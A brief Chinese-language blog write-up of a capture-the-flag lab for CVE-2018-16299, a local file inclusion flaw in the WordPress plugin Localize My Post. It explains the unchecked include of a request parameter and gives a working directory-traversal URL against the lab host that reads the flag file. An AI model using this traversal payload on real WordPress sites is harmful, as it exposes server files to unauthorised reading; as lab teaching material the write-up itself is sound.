春秋云境CVE-2018-16299(极速版)

1.阅读靶场介绍

WordPress Plugin Localize My Post LFI(这个是插件引发的漏洞,目录遍历)

此漏洞源于插件 ajax/include.php 文件中直接使用 include($_REQUEST['file']) 包含用户输入的文件路径,且未做任何安全验证。攻击者可通过路径遍历(Directory Traversal)方式读取系统文件。

2.启动靶场

我们会得到一个如下的页面

3.poc

我们直接访问这个url

https://eci-2zeiaflzr0pmhcd1slg2.cloudeci1.ichunqiu.com:80/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../flag

就可以得到上面的flag了

期待博主攻克任何靶场的欢迎留言哟

感谢你们宝贵的时间